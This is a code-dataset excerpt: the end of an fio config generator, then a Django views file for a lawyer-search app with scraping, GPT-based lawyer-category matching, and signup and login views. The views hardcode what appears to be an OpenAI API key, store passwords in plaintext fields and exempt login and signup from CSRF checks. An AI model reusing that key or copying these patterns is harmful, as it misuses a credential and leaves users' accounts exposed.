1\n # leave one CPU for pmwatch\n if i == cpupol.PHYSICAL_CHIPS + 1:\n end -= 1\n\n if i != 1:\n ret +=','\n ret += '%d-%d' % (start, end)\n return (ret + \"\\n\")\n \n\ndef gen_config_py(ncores, odinfs):\n tcore = cpupol.PHYSICAL_CHIPS * cpupol.CORE_PER_CHIP\n\n for i in ncores: \n for j in methods:\n file_path = \"config-2m-%s-%s.fio\" % (j[0], i) \n if odinfs:\n file_path = os.path.join(ODINFS_DIR, file_path)\n \n f = open(file_path, \"w\")\n f.write(\"[global]\\n\")\n f.write(\"include common.fio\\n\\n\")\n f.write(\"[seq-%s-2m]\\n\" % j)\n if odinfs:\n f.write(gen_odinfs_cpus_allowed())\n else:\n # leave one CPU for pmwatch\n f.write(\"cpus_allowed=0-%d\\n\" % (tcore - 1))\n\n f.write(\"numjobs=%d\\n\" % i)\n f.write(\"rw=%s\\n\" % j)\n f.write(\"stonewall\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n\n ncores = get_ncores()\n\n cores_str = 'cores=(' \n for i in ncores:\n cores_str += str(i) \n if i != ncores[-1]:\n cores_str += ' '\n\n cores_str += ')'\n\n \n f = open(\"common.sh\", \"w\")\n f.write('sudo -v\\n')\n f.write(cores_str)\n f.close()\n\n gen_config_py(ncores, False)\n gen_config_py(ncores, True)\n\n \n\n\n \n\n","repo_name":"rs3lab/Odinfs","sub_path":"eval/ampl/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"72670788734","text":"from django.shortcuts import render,HttpResponse\nfrom .models import *\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport os,sys\nimport subprocess\nimport threading,time\nimport base64\nfrom django.contrib.auth.decorators import login_required\nfrom audioop import reverse\nfrom cmath import log\nimport email\nimport time\nfrom re import template\nimport re\nfrom datetime import datetime\nfrom unittest import loader\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.template import loader\nfrom django.contrib.auth import authenticate,logout,login\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date,datetime\nfrom django.db import IntegrityError\nfrom django.utils import timezone\nfrom django.db.models import Q\nimport requests\nfrom bs4 import BeautifulSoup\nimport openai\nfrom django.db.models import Subquery\nfrom django.core.mail import send_mail\nfrom django.utils.crypto import get_random_string\nfrom smarthack.settings import EMAIL_HOST_USER\n\n# from your_app.models import UserProfilePhoto\n\n\ndef get_gpt3_response(user_message):\n\n api_key = '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'\n \n\n # # print(api_key)\n openai.api_key = api_key\n # Create a conversation prompt\n conversation_history = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": user_message}\n ]\n\n # Convert conversation history to GPT-3.5 input format\n prompt = \"\\n\".join(f\"{item['role']}: {item['content']}\" for item in conversation_history)\n\n # Get GPT-3.5 response\n response = openai.Completion.create(\n engine=\"text-davinci-002\", # GPT-3.5 engine\n prompt=prompt,\n max_tokens=150 # Adjust as needed\n )\n\n gpt3_response = response.choices[0].text.strip()\n return gpt3_response\n\n# Example usage\n\ndef fn(request):\n #str=\"Choose from Given options what type of lawyer i need.and option are \"\n str = \"Reply in one word from given options what type of lawyer i need and options are \"\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n cnt=0\n sz=len(list1)\n for l1 in list1:\n str +=l1\n str +=\" ,\"\n\n # str +=\"I need reply in one word and exact same to given option with hyphen.\" \n return str\n\ndef lawerexactmatch(request):\n list1=[]\n list1.append(\"arbitration\")\n list1.append(\"anticipatory\")\n list1.append(\"banking\")\n list1.append(\"bankruptcy\")\n list1.append(\"breach\")\n list1.append(\"civil\")\n list1.append(\"corporate\")\n list1.append(\"family\")\n list1.append(\"criminal\")\n list1.append(\"cyber\")\n list1.append(\"domestic\")\n list1.append(\"divorce\")\n list1.append(\"muslim\")\n list1.append(\"wills\")\n list1.append(\"copyright\")\n list1.append(\"court\")\n list1.append(\"domestic\")\n list1.append(\"gst\")\n list1.append(\"immigration\")\n list1.append(\"labour\")\n list1.append(\"media\")\n list1.append(\"medical\")\n return list1\ndef lawerecatagoryexactmatch(request):\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n return list1\n\n\n\n\n\n\n# Create your views here.\ndef storedata(request):\n # return render(request,'navebar.html')\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n\n cnt=0\n for l1 in list1:\n # URL of the page for the current advocate type\n url = f'https://lawrato.com/{l1}'\n cnt+=1\n \n # Send an HTTP GET request to the URL\n response = requests.get(url)\n\n # Check if the request was successful (status code 200)\n if response.status_code == 200:\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find all the lawyer listings with the specified class\n lawyer_listings = soup.find_all('div', class_='lawyer-item border-box')\n\n # Loop through all the lawyer listings for the current advocate type\n for lawyer in lawyer_listings:\n # Extract lawyer's name\n name = lawyer.find('h2', class_='media-heading').text.strip()\n\n # Extract lawyer's location\n location = lawyer.find('div', class_='location').text.strip()\n\n # Extract lawyer's experience\n experience = lawyer.find('div', class_='experience').text.strip()\n image_url = lawyer.find('img', class_='media-object')['src']\n # areaskill=lawyer.find('div', class_='area-skill').text.strip()\n\n # Extract lawyer's contact link\n # contact_link = lawyer.find('a', title='CONTACT NOW')['href']\n\n # Extract lawyer's rating\n rating = lawyer.find('span', class_='score').text.strip()\n advocate = Advocate(\n name=name,\n type=l1,\n location=location,\n experience=experience,\n rating=rating,\n image_url=image_url\n )\n print(name)\n cat=Advocatecatagory(cat=l1)\n cat.save()\n advocate.save()\n\n # # print or store the extracted information for each lawyer\n # print(f\"Type: {l1}\")\n # print(f\"Name: {name}\")\n # print(f\"Location: {location}\")\n # print(f\"Experience: {experience}\")\n # # print(f\"Contact Link: {contact_link}\")\n # print(f\"Rating: {rating}\")\n # print()\n else:\n print(f\"Failed to retrieve the page for {l1}. Status code:\", response.status_code)\n\n return render(request,'navebar.html')\n\n\n\ndef webscrapdata(request):\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n list1.append(\"property-lawyers\")\n list1.append(\"rti-lawyers\")\n list1.append(\"armed-forces-tribunal-lawyers\")\n list1.append(\"consumer-court-lawyers\")\n cnt=0\n max_page=2\n for l1 in list1:\n base_url = f'https://lawrato.com/{l1}'\n cnt+=1\n page_number=1\n url = f'{base_url}?&page={page_number}'\n page_number+=1\n response = requests.get(url)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, 'html.parser')\n lawyer_listings = soup.find_all('div', class_='lawyer-item border-box')\n for lawyer in lawyer_listings:\n name = lawyer.find('h2', class_='media-heading').text.strip()\n location = lawyer.find('div', class_='location').text.strip()\n experience = lawyer.find('div', class_='experience').text.strip()\n image_url = lawyer.find('img', class_='media-object')['src']\n area_skill_div = lawyer.find('div', class_='area-skill')\n practice_area_skills = \"Criminal, Consumer Court\"\n if area_skill_div:\n div_contents = area_skill_div.find('div')\n if div_contents:\n practice_area_skills = div_contents.text.strip()\n rating = lawyer.find('span', class_='score').text.strip()\n advocate = Advocatefin(\n name=name,\n type=l1,\n location=location,\n experience=experience,\n rating=rating,\n image_url=image_url,\n practice_area_skills=practice_area_skills \n )\n print(name,type)\n # cat = Advocatecatagoryfin(cat=l1)\n # cat.save()\n # advocate.save()\n\n else:\n print(f\"Failed to retrieve the page for {l1}. Status code:\", response.status_code)\n\n return render(request,'navebar.html')\n\ndef webscrapdatapage2(request):\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n list1.append(\"property-lawyers\")\n list1.append(\"rti-lawyers\")\n list1.append(\"armed-forces-tribunal-lawyers\")\n list1.append(\"consumer-court-lawyers\")\n cnt=0\n max_page=2\n for l1 in list1:\n base_url = f'https://lawrato.com/{l1}'\n cnt+=1\n page_number=1\n url = f'{base_url}?&page={page_number}'\n page_number+=1\n response = requests.get(url)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, 'html.parser')\n lawyer_listings = soup.find_all('div', class_='lawyer-item border-box')\n for lawyer in lawyer_listings:\n name = lawyer.find('h2', class_='media-heading').text.strip()\n location = lawyer.find('div', class_='location').text.strip()\n experience = lawyer.find('div', class_='experience').text.strip()\n image_url = lawyer.find('img', class_='media-object')['src']\n area_skill_div = lawyer.find('div', class_='area-skill')\n practice_area_skills = \"Criminal, Consumer Court\"\n if area_skill_div:\n div_contents = area_skill_div.find('div')\n if div_contents:\n practice_area_skills = div_contents.text.strip()\n rating = lawyer.find('span', class_='score').text.strip()\n advocate = Advocatefin(\n name=name,\n type=l1,\n location=location,\n experience=experience,\n rating=rating,\n image_url=image_url,\n practice_area_skills=practice_area_skills \n )\n # cat = Advocatecatagoryfin(cat=l1)\n # cat.save()\n advocate.save()\n\n else:\n print(f\"Failed to retrieve the page for {l1}. Status code:\", response.status_code)\n\n return render(request,'navebar.html')\n\n\n\n\n\n\n\n\n\n\n\ndef arbitration_mediation_lawyers_data(request):\n # Define the URL you want to scrape\n url = 'https://www.leadindia.law/arbitration-and-mediation-lawyers'\n\n # Set a custom User-Agent header to mimic a real web browser\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'\n }\n\n # Create a session to manage cookies\n session = requests.Session()\n response = session.get(url, headers=headers)\n\n # Check if the request was successful (status code 200)\n if response.status_code == 200:\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find all the lawyer listings within the specified class\n lawyer_listings = soup.find_all('div', class_='card shadow card-hover-shadow p-2')\n\n # Loop through all the lawyer listings\n for lawyer in lawyer_listings:\n # Extract lawyer's name\n name_element = lawyer.find('h6').find('a')\n name = name_element.text.strip() if name_element else None\n\n # Extract lawyer's rating\n rating_element = lawyer.find('li', class_='list-inline-item ms-0 h6 small fw-bold mb-0')\n rating = rating_element.text.strip() if rating_element else None\n\n # Extract lawyer's experience\n small_elements = lawyer.find_all('small')\n if len(small_elements) >= 3:\n experience = small_elements[0].get_text(strip=True)\n location = small_elements[1].get_text(strip=True)\n language = small_elements[2].get_text(strip=True)\n else:\n experience = location = language = None\n\n # Extract lawyer's practice areas\n practice_areas_element = lawyer.find('p', class_='p-0 m-0 h-75')\n practice_areas = practice_areas_element.text.strip() if practice_areas_element else None\n\n # Extract lawyer's contact link\n contact_link_element = lawyer.find('a', class_='btn btn-xs btn-dark')\n contact_link = contact_link_element['href'] if contact_link_element else None\n\n # Extract lawyer's photo URL\n photo_element = lawyer.find('img', class_='card-img')\n photo_url = photo_element['src'] if photo_element else None\n\n # # print or store the extracted information for each lawyer, including photo URL\n lawyer_instance =Aribitration_mediator(\n name=name,\n rating=rating,\n experience=experience,\n location=location,\n practice_areas=practice_areas,\n language=language,\n photo_url=photo_url,\n contact_link=contact_link\n )\n lawyer_instance.save()\n else:\n print(f\"Failed to retrieve the page. Status code:\", response.status_code)\n\n return render(request, 'navebar.html')\n\ndef accountcreate(request):\n try:\n return render(request, 'signup.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef check_login(request):\n # {% if user.is_authenticated %} this can be used in frontend\n user=request.user\n # good to know this that fn exist for authentication\n if user.is_authenticated: \n return True\n else :\n return False\n \n@csrf_exempt\ndef signup(request):\n if request.method == \"POST\":\n try:\n username = request.POST['username']\n firstname = request.POST['fname']\n lastname = request.POST['lname']\n email = request.POST['email']\n pass1 = request.POST['password']\n type=Eitheruserlawyer(type=\"user\")\n otp = get_random_string(length=6, allowed_chars='0123456789')\n print(otp)\n # user.profile.otp = otp \n # user.profile.save()\n subject = 'Your OTP for Signup'\n message = f'Your OTP is {otp}. Enter this code to complete your signup.'\n from_email = 'shubhamkumar9264shu@gmail.com'\n to_email = email\n print(to_email)\n send_mail(subject, message, from_email, [to_email],fail_silently=True)\n \n\n\n\n\n\n\n\n\n\n\n type.save()\n myuser = User.objects.create_user(username, email, pass1)\n user_db = User_detail(eitheruserlawyer=type,user_detail_name=username, user_detail_email=email, user_detail_password=pass1)\n myuser.first_name = firstname\n myuser.last_name = lastname\n myuser.save()\n user_db.save()\n user = authenticate(username=username, password=pass1)\n user_status = 1\n user_d = request.user\n obj = Blog.objects.all()\n lawyer=Laweruser.objects.all()\n # # # lawyer=Lawyer.objects.all()\n context = {\n 'obj': obj,\n \"user_d\": user_d,\n \"user_status\": user_status,\n 'lawyer':lawyer\n }\n \n if user is not None:\n login(request, user)\n id1 = user.id\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n \n return render(request, 'index2.html', context)\n else:\n return render(request, 'loginpage.html')\n except IntegrityError:\n error_message = \"Username or email already taken. Please choose a different username or email.\"\n return render(request, 'signup.html', {'error_message': error_message})\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n else:\n return render(request, 'signup.html')\n@csrf_exempt\ndef signuplawyer(request):\n if request.method == \"POST\":\n try:\n username = request.POST['username']\n firstname = request.POST['fname']\n lastname = request.POST['lname']\n email = request.POST['email']\n pass1 = request.POST['password']\n type=Eitheruserlawyer(type=\"lawyer\")\n type.save()\n myuser = User.objects.create_user(username, email, pass1)\n user_db = User_detail(eitheruserlawyer=type,user_detail_name=username, user_detail_email=email, user_detail_password=pass1)\n myuser.first_name = firstname\n myuser.last_name = lastname\n extradetaillawer=Extradetaillawer.objects.filter(pk=1)\n laweruser=Laweruser(eitheruserlawyer=type,extradetaillawer=extradetaillawer[0],name=username,fname=firstname,lname=lastname,email=email, password=pass1)\n myuser.save()\n user_db.save()\n laweruser.save()\n typelawyer=Typelawer(laweruser=laweruser)\n typelawyer.save()\n user = authenticate(username=username, password=pass1)\n user_status = 1\n user_d = request.user\n obj = Blog.objects.all()\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n context = {\n 'obj': obj,\n \"user_d\": user_d,\n \"user_status\": user_status,\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n \n if user is not None:\n login(request, user)\n id1 = user.id\n distinct_names = Advocatefin.objects.values('name').distinct()[:6]\n advocates = Advocatefin.objects.filter(name__in=Subquery(distinct_names))\n # 'Lawyers': advocates\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n \n return render(request, 'index2.html', context)\n else:\n return render(request, 'loginpage.html')\n except IntegrityError:\n error_message = \"Username or email already taken. Please choose a different username or email.\"\n return render(request, 'signuplawer.html', {'error_message': error_message})\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n else:\n return render(request, 'signuplawer.html')\n\n@login_required\ndef upload_photo(request):\n if request.method == 'POST' and 'profile_photo' in request.FILES:\n user_profile = UserProfilePhoto.objects.get_or_create(user=request.user)[0]\n user_profile.photo = request.FILES['profile_photo']\n user_profile.save()\n return redirect('profile') \n@csrf_exempt\ndef loginuser(request):\n if request.method == \"POST\":\n try:\n user_d = request.user\n username = request.POST['username']\n pass1 = request.POST['password']\n \n user = authenticate(username=username, password=pass1)\n \n if user is not None:\n login(request, user)\n id1 = user.id\n user_status = 1\n obj = Blog.objects.all()\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n # print(lawyer)\n context = {\n 'obj': obj,\n 'user_d': user_d,\n 'user_status': user_status,\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n return render(request, 'index2.html', context)\n else:\n error_message = \"Invalid username or password.\"\n return render(request, 'loginpage.html', {'error_message': error_message})\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n else:\n return render(request, 'loginpage.html')\n\n@csrf_exempt\ndef logoutuser(request):\n try:\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n return render(request, 'index2.html',context)\n \n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \n return render(request, 'loginpage.html')\n@csrf_exempt\ndef index(request):\n # return render(request,'dummychat.html')\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n # names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n # distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n # # print(distinct_names)\n # advocates_list = []\n # # ad=Advocatefin.objects.all()\n # # # print(len(ad))\n\n # for name_dict in distinct_names:\n # name = name_dict['name']\n # advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n # if advocate:\n # advocates_list.append(advocate)\n # # print(type(advocates))\n # # print(advocates_list)\n # 'Lawyers': advocates\n advocates_list=Advocatefin.objects.all()\n adv1=[]\n cnt=0\n for l1 in advocates_list:\n adv1.append(l1)\n cnt+=1\n if cnt==6:\n break\n context['Lawyers']=adv1\n # return render(request, 'index2.html',context)\n try:\n if request.user.is_authenticated:\n return render(request, 'index2.html')\n else:\n return render(request, 'signup.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \n@csrf_exempt\ndef home(request):\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n advocates_list=Advocatefin.objects.all()\n adv1=[]\n cnt=0\n for l1 in advocates_list:\n adv1.append(l1)\n cnt+=1\n if cnt==6:\n break\n context['Lawyers']=adv1\n return render(request, 'index2.html',context)\n\n@csrf_exempt\ndef carousel(request):\n try:\n if request.user.is_authenticated:\n context = {}\n return render(request, 'carousel.html', context)\n else:\n return render(request, 'signup.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef blog(request):\n try:\n if request.method == \"GET\":\n obj = Blog.objects.all()\n sz=len(obj)\n advocates = Advocatefin.objects.all()[:sz]\n ziped_list=list(zip(obj,advocates))\n # # print(ziped_list)\n # # print(advocates)\n # print(obj)\n context = {'obj': obj,'advocates':advocates,'ziped_list':ziped_list}\n return render(request, 'blog.html', context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \n\n\ndef chatPage(request, *args, **kwargs):\n try:\n if not request.user.is_authenticated:\n return redirect(\"login-user\")\n \n context = {}\n return render(request, \"chatage.html\", context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef chat_with_user(request, recipient_username):\n return render(request, 'chatpage.html', {\n 'recipient_username': recipient_username})\n\n@csrf_exempt\ndef chat(request,receiver_id):\n if request.method == \"POST\":\n pass\n else : \n chat_request = ChatRequest.objects.get(pk=receiver_id)\n pass\n return render(request,'navebar.html')\n\n\n\n \n \n \n\n\ndef readmore(request, id1, id2):\n try:\n\n if request.method == \"GET\":\n \n obj = Blog.objects.filter(pk=id1)\n lawyer=Advocatefin.objects.filter(pk=id2)\n context = {\n 'obj': obj[0],\n 'lawyer':lawyer[0]\n }\n blog = Blog.objects.all()[:4]\n \n sz=len(blog)\n # print(sz)\n # print(blog)\n advocates = Advocatefin.objects.all()[:sz]\n # print(advocates)\n ziped_list=list(zip(blog,advocates))\n # print(ziped_list)\n # print(len(ziped_list))\n context['ziped_list']=ziped_list\n return render(request, 'blogafteropen.html', context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef dashboard(request):\n try:\n # # print(request.user.username)\n # user=User_detail.objects.filter(pk=request.user.id)\n # # print(user)\n # return render(request,'navebar.html')\n return render(request, 'profile.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef setting(request):\n try:\n return render(request, 'profile.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \ndef lawyer(request,id1):\n try:\n # return render(request,'navebar.html')\n lawyer=Laweruser.objects.filter(pk=id1)\n \n context={\n 'lawyer':lawyer[0],\n }\n # print(lawyer)\n # return render(request,'navebar.html')\n \n \n return render(request, 'lawyer.html',context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \ndef send_chat_request(request,receiver_id):\n try:\n receiver = Extradetaillawer.objects.get(pk=receiver_id)\n chat_request=ChatRequest(sender=request.user,receiver=receiver)\n chat_request.save()\n messages.success(request, 'abhi accept nhi hua hai')\n lawyer=Extradetaillawer.objects.filter(pk=receiver_id)\n # print(lawyer)\n chatrequest=ChatRequest.objects.filter(receiver=lawyer[0])\n cnt=len(chatrequest)\n # print(cnt)\n context={\n 'lawyer':lawyer[0],\n 'cnt':cnt\n }\n if cnt!=0:\n context['chatrequest']=chatrequest[0]\n # print(context)\n # return render(request,'navebar.html')\n return render(request, 'lawyer.html',context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\n\n\n\ndef accept_chat_request(request, request_id):\n try:\n chat_request = ChatRequest.objects.get(pk=request_id)\n chat_request.accepted = True\n chat_request.save()\n return redirect('chat', chat_request.receiver.id)\n except Exception as e:\n # print(str(e)) \n \n return render(request, 'error.html', {'error_message': 'An error occurred while processing your request'})\n\n\n@login_required\ndef rooms(request):\n rooms = Room.objects.all()\n\n return render(request, 'room/rooms.html', {'rooms': rooms})\n\n@login_required\ndef room(request, id1,id2):\n room = Room.objects.get(pk=id2)\n lawyer=Laweruser.objects.filter(pk=id1)\n # print(lawyer)\n room=lawyer[0].room\n messages = Message.objects.filter(room=room)[0:25]\n \n \n context={\n 'lawyer':lawyer[0],\n 'messages':messages\n }\n \n # return render(request,'navebar.html')\n \n \n return render(request, 'room.html',context)\n\n # return render(request, 'room.html', {'room': room, 'messages': messages})\n\ndef typelawyer(request,type):\n type=Typelawer.objects.filter(type=type)\n cnt=len(type)\n context={\n 'type':type,\n 'cnt':cnt\n }\n \n return render(request,'filteradvocate.html',context)\n\ndef update(request,id1):\n # write logic baad me not in priority\n try:\n # # print(request.user.username)\n # user=User_detail.objects.filter(pk=request.user.id)\n # # print(user)\n # return render(request,'navebar.html')\n # if request.method==\"POST\":\n # User.username=request.user.username\n # User.email=request.POST['email']\n # User.first_name=request.POST['first_name']\n # User.last_name=request.POST['last_name']\n # User.save()\n \n return render(request, 'profile.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\n\n\n\ndef consult(request):\n try:\n return render(request, 'problem.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error.html', {'error_message': error_message})\n\n\n\n\ndef submitproblem(request):\n try:\n if request.method == \"POST\":\n city = request.POST.get('city', '')\n problem = request.POST.get('problem', '')\n # print(city)\n # print(problem)\n if not city or not problem:\n error_message = \"Both 'city' and 'problem' are required.\"\n return render(request, 'problem.html', {'error_message': error_message})\n\n user_message = problem\n res = fn(request)\n user_message += \" \"\n user_message += res\n # print(user_message)\n\n gpt3_response = get_gpt3_response(user_message)\n gpt3_response = gpt3_response.lower()\n item = lawerexactmatch(request)\n lawyeritem = lawerecatagoryexactmatch(request)\n ans = \"\"\n ind = 0\n\n for i1 in item:\n if gpt3_response.find(i1) != -1:\n ans = lawyeritem[ind]\n break\n ind += 1\n\n # print(ans)\n\n 